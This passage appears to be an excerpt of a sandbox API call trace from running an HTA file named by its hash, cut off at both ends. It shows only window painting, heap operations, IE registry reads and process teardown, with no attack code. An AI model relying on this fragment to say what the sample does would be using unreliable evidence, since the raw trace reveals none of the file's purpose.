lprcSrc1=0x30b660, lprcSrc2=0x45c410 | out: lprcDst=0x30b660) returned 1 [0079.811] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x2edd2d0 [0079.811] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x2edd2d0) returned 0x17040b46 [0079.812] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edd2d0 | out: hHeap=0x3f0000) returned 1 [0079.812] SelectClipRgn (hdc=0x1a010b3a, hrgn=0x17040b46) returned 2 [0079.812] IntersectRect (in: lprcDst=0x30b420, lprcSrc1=0x30b420, lprcSrc2=0x30b3f0 | out: lprcDst=0x30b420) returned 1 [0079.812] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30b410 | out: lprcDst=0x45c420) returned 1 [0079.812] IntersectRect (in: lprcDst=0x30b290, lprcSrc1=0x30b290, lprcSrc2=0x45c410 | out: lprcDst=0x30b290) returned 1 [0079.812] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x44c3d0 [0079.813] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0079.813] IntersectRect (in: lprcDst=0x30b4f0, lprcSrc1=0x30b4f0, lprcSrc2=0x30b4c0 | out: lprcDst=0x30b4f0) returned 1 [0079.813] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.813] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30b270 | out: lprcDst=0x45c420) returned 1 [0079.813] IntersectRect (in: lprcDst=0x30b270, lprcSrc1=0x30b270, lprcSrc2=0x45c430 | out: lprcDst=0x30b270) returned 1 [0079.813] GetDeviceCaps (hdc=0x1a010b3a, index=2) returned 1 [0079.813] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x2edd2d0 [0079.813] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x2edd2d0) returned 0x7040b47 [0079.813] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edd2d0 | out: hHeap=0x3f0000) returned 1 [0079.813] SelectClipRgn (hdc=0x1a010b3a, hrgn=0x7040b47) returned 2 [0079.813] DeleteObject (ho=0x7040b47) returned 1 [0079.813] SelectObject (hdc=0x1a010b3a, h=0x44100b60) returned 0x1900010 [0079.814] PatBlt (hdc=0x1a010b3a, x=2, y=2, w=1043, h=583, rop=0xf00021) returned 1 [0079.814] SelectObject (hdc=0x1a010b3a, h=0x1900010) returned 0x44100b60 [0079.814] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30b4e0 | out: lprcDst=0x45c420) returned 1 [0079.814] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30b500 | out: lprcDst=0x45c420) returned 1 [0079.814] IntersectRect (in: lprcDst=0x30b110, lprcSrc1=0x30b110, lprcSrc2=0x30b0e0 | out: lprcDst=0x30b110) returned 1 [0079.814] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.814] IntersectRect (in: lprcDst=0x30af70, lprcSrc1=0x30af70, lprcSrc2=0x45c430 | out: lprcDst=0x30af70) returned 0 [0079.814] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30ae90 | out: lprcDst=0x45c420) returned 1 [0079.814] IntersectRect (in: lprcDst=0x30ae90, lprcSrc1=0x30ae90, lprcSrc2=0x45c430 | out: lprcDst=0x30ae90) returned 1 [0079.815] GetDeviceCaps (hdc=0x1a010b3a, index=2) returned 1 [0079.815] IntersectRect (in: lprcDst=0x30ac10, lprcSrc1=0x30e440, lprcSrc2=0x30ac10 | out: lprcDst=0x30ac10) returned 1 [0079.815] CreateSolidBrush (color=0x2ffffff) returned 0x2100b48 [0079.815] SelectObject (hdc=0x1a010b3a, h=0x2100b48) returned 0x1900010 [0079.815] GetStockObject (i=8) returned 0x1b00016 [0079.815] SelectObject (hdc=0x1a010b3a, h=0x1b00016) returned 0x1b00016 [0079.816] GetROP2 (hdc=0x1a010b3a) returned 13 [0079.816] SetBkMode (hdc=0x1a010b3a, mode=2) returned 2 [0079.816] Rectangle (hdc=0x1a010b3a, left=2, top=2, right=1046, bottom=586) returned 1 [0079.817] SetBkMode (hdc=0x1a010b3a, mode=2) returned 2 [0079.817] SelectObject (hdc=0x1a010b3a, h=0x1b00016) returned 0x1b00016 [0079.817] SelectObject (hdc=0x1a010b3a, h=0x1900010) returned 0x2100b48 [0079.817] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30b100 | out: lprcDst=0x45c420) returned 1 [0079.817] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30b120 | out: lprcDst=0x45c420) returned 1 [0079.818] IntersectRect (in: lprcDst=0x30ab50, lprcSrc1=0x30ab50, lprcSrc2=0x30a9d0 | out: lprcDst=0x30ab50) returned 1 [0079.818] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.818] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30ab50 | out: lprcDst=0x45c420) returned 1 [0079.818] IntersectRect (in: lprcDst=0x30aab0, lprcSrc1=0x30aab0, lprcSrc2=0x45c430 | out: lprcDst=0x30aab0) returned 1 [0079.818] IntersectRect (in: lprcDst=0x45c420, lprcSrc1=0x45c420, lprcSrc2=0x30aa60 | out: lprcDst=0x45c420) returned 1 [0079.818] GetDeviceCaps (hdc=0x1a010b3a, index=2) returned 1 [0079.818] GetCurrentObject (hdc=0x1a010b3a, type=0x6) returned 0x18a002e [0079.819] SetBkMode (hdc=0x1a010b3a, mode=1) returned 2 [0079.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.819] SetTextAlign (hdc=0x1a010b3a, align=0x0) returned 0x0 [0079.819] SelectObject (hdc=0x1a010b3a, h=0x18a002e) returned 0x18a002e [0079.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.819] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.819] DeleteObject (ho=0x17040b46) returned 1 [0079.819] GetStockObject (i=15) returned 0x188000b [0079.819] SelectPalette (hdc=0x1a010b3a, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0079.819] EndPaint (hWnd=0x20316, lpPaint=0x30e800) returned 1 [0079.819] MapWindowPoints (in: hWndFrom=0x20316, hWndTo=0x0, lpPoints=0x30e378, cPoints=0x1 | out: lpPoints=0x30e378) returned 13435063 [0079.819] DeleteObject (ho=0xf040b3e) returned 1 [0079.819] GetCurrentThreadId () returned 0xf14 [0079.819] GetCurrentThreadId () returned 0xf14 [0079.820] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.820] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.820] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.820] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.820] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.820] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.820] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.820] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.820] GetCurrentThreadId () returned 0xf14 [0079.821] GetCurrentThreadId () returned 0xf14 [0079.821] GetCurrentThreadId () returned 0xf14 [0079.821] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30eb70 | out: lpPoint=0x30eb70) returned 1 [0079.821] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0079.822] GetCurrentThreadId () returned 0xf14 [0079.822] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0079.822] GetCurrentThreadId () returned 0xf14 [0079.822] GetFocus () returned 0x20316 [0079.822] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x90) returned 0x4d2160 [0079.822] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0079.823] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30ec10 | out: lpPoint=0x30ec10) returned 1 [0079.823] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0079.823] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0079.823] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30eba0 | out: lpPoint=0x30eba0) returned 1 [0079.824] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0079.824] GetCurrentThreadId () returned 0xf14 [0079.824] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0079.824] GetCurrentThreadId () returned 0xf14 [0079.824] IsWinEventHookInstalled (event=0x8005) returned 0 [0079.824] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned -5 [0079.824] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned -5 [0079.825] GetCurrentThreadId () returned 0xf14 [0079.825] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30f200 | out: lpPoint=0x30f200) returned 1 [0079.825] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0079.825] GetCurrentThreadId () returned 0xf14 [0079.825] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0079.825] GetCurrentThreadId () returned 0xf14 [0079.826] GetCurrentThreadId () returned 0xf14 [0079.826] GetFocus () returned 0x20316 [0080.174] GetCurrentThreadId () returned 0xf14 [0080.226] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30f170 | out: lpPoint=0x30f170) returned 1 [0080.226] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0080.227] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0080.227] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30f100 | out: lpPoint=0x30f100) returned 1 [0080.227] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0080.227] GetCurrentThreadId () returned 0xf14 [0080.228] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0080.228] GetCurrentThreadId () returned 0xf14 [0080.228] IsWinEventHookInstalled (event=0x8005) returned 0 [0080.228] GetCurrentThreadId () returned 0xf14 [0080.228] GetMessageW (in: lpMsg=0x30f620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x30f620) returned 1 [0080.231] TranslateMessage (lpMsg=0x30f620) returned 0 [0080.249] DispatchMessageW (lpMsg=0x30f620) returned 0x0 [0080.250] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30eb80 | out: lpPoint=0x30eb80) returned 1 [0080.250] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0080.251] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0080.251] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30e8d0 | out: lpPoint=0x30e8d0) returned 1 [0080.251] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0080.251] GetCurrentThreadId () returned 0xf14 [0080.251] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0080.251] GetCurrentThreadId () returned 0xf14 [0080.251] GetCurrentThreadId () returned 0xf14 [0080.251] DestroyWindow (hWnd=0x40106) returned 1 [0080.281] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0080.281] GetMessageTime () returned 29504562 [0080.281] GetMessagePos () returned 0x1130586 [0080.281] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x30e830 | out: plResult=0x30e830) returned 0x0 [0080.282] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0080.282] GetMessageTime () returned 29504562 [0080.282] GetMessagePos () returned 0x1130586 [0080.282] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x188) returned 0x2edaea0 [0080.282] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x30de90 | out: plResult=0x30de90) returned 0x0 [0080.283] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edaea0 | out: hHeap=0x3f0000) returned 1 [0080.283] GetCurrentThreadId () returned 0xf14 [0080.283] GetCurrentThreadId () returned 0xf14 [0080.283] PostQuitMessage (nExitCode=0) [0080.283] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0080.283] RevokeDragDrop (hwnd=0x20316) returned 0x0 [0080.283] GetCurrentThreadId () returned 0xf14 [0080.283] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0080.283] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x30f1e0 | out: plResult=0x30f1e0) returned 0x1 [0080.283] NtdllDefWindowProc_W (hWnd=0x20316, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0080.284] GetCurrentThreadId () returned 0xf14 [0080.284] SetWindowLongPtrW (hWnd=0x20316, nIndex=-21, dwNewLong=0x0) returned 0x435570 [0080.287] GetMessageW (in: lpMsg=0x30f620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x30f620) returned 0 [0080.287] PostMessageW (hWnd=0x6030e, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0080.287] GetCurrentThreadId () returned 0xf14 [0080.287] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.287] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.287] ScreenToClient (in: hWnd=0x0, lpPoint=0x30f230 | out: lpPoint=0x30f230) returned 0 [0080.288] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0080.288] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0080.288] ScreenToClient (in: hWnd=0x0, lpPoint=0x30f1c0 | out: lpPoint=0x30f1c0) returned 0 [0080.288] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c3d0 [0080.289] GetCurrentThreadId () returned 0xf14 [0080.289] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c3d0 | out: hHeap=0x3f0000) returned 1 [0080.289] GetCurrentThreadId () returned 0xf14 [0080.289] IsWinEventHookInstalled (event=0x8005) returned 0 [0080.289] GetCurrentThreadId () returned 0xf14 [0080.289] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x450890) returned 0x0 [0080.289] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x459d40 | out: hHeap=0x3f0000) returned 1 [0080.289] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ed32c0 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c430 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45c6d0 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.290] IntersectRect (in: lprcDst=0x30f0a0, lprcSrc1=0x30f0a0, lprcSrc2=0x30f340 | out: lprcDst=0x30f0a0) returned 1 [0080.290] IntersectRect (in: lprcDst=0x30f350, lprcSrc1=0x30f350, lprcSrc2=0x30f0a0 | out: lprcDst=0x30f350) returned 1 [0080.290] IntersectRect (in: lprcDst=0x30f3d0, lprcSrc1=0x30f3d0, lprcSrc2=0x30f340 | out: lprcDst=0x30f3d0) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.290] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.291] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45c260 | out: hHeap=0x3f0000) returned 1 [0080.291] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.291] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45c3c0 | out: hHeap=0x3f0000) returned 1 [0080.291] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.291] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45c540 | out: hHeap=0x3f0000) returned 1 [0080.291] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414f80 | out: hHeap=0x3f0000) returned 1 [0080.291] GetCurrentThreadId () returned 0xf14 [0080.291] GetCurrentThreadId () returned 0xf14 [0080.291] GetCurrentThreadId () returned 0xf14 [0080.292] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45bc40 | out: hHeap=0x3f0000) returned 1 [0080.292] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.292] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.292] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.292] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.292] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e890 | out: hHeap=0x3f0000) returned 1 [0080.292] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414380 | out: hHeap=0x3f0000) returned 1 [0080.292] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30f448 | out: phkResult=0x30f448*=0x2e4) returned 0x0 [0080.293] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30f450 | out: phkResult=0x30f450*=0x2e8) returned 0x0 [0080.293] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x30f3d8 | out: phkResult=0x30f3d8*=0x0) returned 0x2 [0080.293] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x30f3d8 | out: phkResult=0x30f3d8*=0x0) returned 0x2 [0080.293] RegCloseKey (hKey=0x0) returned 0x6 [0080.293] RegCloseKey (hKey=0x0) returned 0x6 [0080.293] RegCloseKey (hKey=0x2e4) returned 0x0 [0080.293] RegCloseKey (hKey=0x2e8) returned 0x0 [0080.293] GetCurrentThreadId () returned 0xf14 [0080.293] GetCurrentThreadId () returned 0xf14 [0080.293] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.293] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cda80 | out: hHeap=0x3f0000) returned 1 [0080.293] GetCurrentThreadId () returned 0xf14 [0080.293] GetCurrentThreadId () returned 0xf14 [0080.293] GetCurrentThreadId () returned 0xf14 [0080.294] IUnknown:Release (This=0x4dbce0) returned 0x1 [0080.294] GetCurrentThreadId () returned 0xf14 [0080.294] GetCurrentThreadId () returned 0xf14 [0080.294] GetCurrentThreadId () returned 0xf14 [0080.294] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.294] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.294] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.294] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.294] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.295] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0860 | out: hHeap=0x3f0000) returned 1 [0080.295] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b9c0 | out: hHeap=0x3f0000) returned 1 [0080.295] free (_Block=0x68a720) [0080.296] free (_Block=0x68b300) [0080.296] free (_Block=0x2f50c00) [0080.296] free (_Block=0x687800) [0080.296] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.296] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.296] ISystemDebugEventFire:EndSession (This=0x4dbce0) returned 0x0 [0080.296] IUnknown:Release (This=0x4dbce0) returned 0x0 [0080.297] GetUserDefaultLCID () returned 0x409 [0080.297] GetACP () returned 0x4e4 [0080.297] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.297] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.297] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.297] free (_Block=0x3150040) [0080.304] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.304] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.304] GetCurrentThreadId () returned 0xf14 [0080.305] free (_Block=0x2f50110) [0080.305] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.305] ??3@YAXPEAX@Z () returned 0x49361a01 [0080.305] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.305] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4dbd50 | out: hHeap=0x3f0000) returned 1 [0080.306] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4517c0 | out: hHeap=0x3f0000) returned 1 [0080.306] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e0890 | out: hHeap=0x3f0000) returned 1 [0080.306] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.306] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.306] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.306] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.306] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4459f0 | out: hHeap=0x3f0000) returned 1 [0080.307] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b880 | out: hHeap=0x3f0000) returned 1 [0080.307] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x418e70 | out: hHeap=0x3f0000) returned 1 [0080.307] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cda40 | out: hHeap=0x3f0000) returned 1 [0080.307] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.307] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45bbf0 | out: hHeap=0x3f0000) returned 1 [0080.307] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cdac0 | out: hHeap=0x3f0000) returned 1 [0080.308] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.308] IUnknown:Release (This=0x43c0b0) returned 0x0 [0080.308] IUnknown:Release (This=0x435f98) returned 0x0 [0080.308] IUnknown:Release (This=0x7fef0002708) returned 0x1 [0080.308] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4477a0 | out: hHeap=0x3f0000) returned 1 [0080.308] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420bb0 | out: hHeap=0x3f0000) returned 1 [0080.308] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.309] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x438950 | out: hHeap=0x3f0000) returned 1 [0080.309] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x30f500 | out: ppURI=0x30f500*=0x42cf10) returned 0x0 [0080.309] IUri:GetScheme (in: This=0x42cf10, pdwScheme=0x30f440 | out: pdwScheme=0x30f440*=0x11) returned 0x0 [0080.309] IUnknown:QueryInterface (in: This=0x42cf10, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30f440 | out: ppvObject=0x30f440*=0x42cf10) returned 0x0 [0080.309] IUnknown:Release (This=0x42cf10) returned 0x3 [0080.309] IUnknown:AddRef (This=0x42cf10) returned 0x4 [0080.309] IUnknown:Release (This=0x42cf10) returned 0x3 [0080.310] IUri:IsEqual (in: This=0x44ef70, pUri=0x42cf10, pfEqual=0x30f4e0 | out: pfEqual=0x30f4e0*=0) returned 0x0 [0080.310] IUnknown:Release (This=0x44ef70) returned 0x2 [0080.310] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.310] IUnknown:AddRef (This=0x42cf10) returned 0x4 [0080.310] IUri:GetAbsoluteUri (in: This=0x42cf10, pbstrAbsoluteUri=0x42f480 | out: pbstrAbsoluteUri=0x42f480*="about:blank") returned 0x0 [0080.310] IUnknown:Release (This=0x42cf10) returned 0x3 [0080.310] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.310] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0080.310] GetCurrentProcessId () returned 0xf10 [0080.310] HeapFree (in: 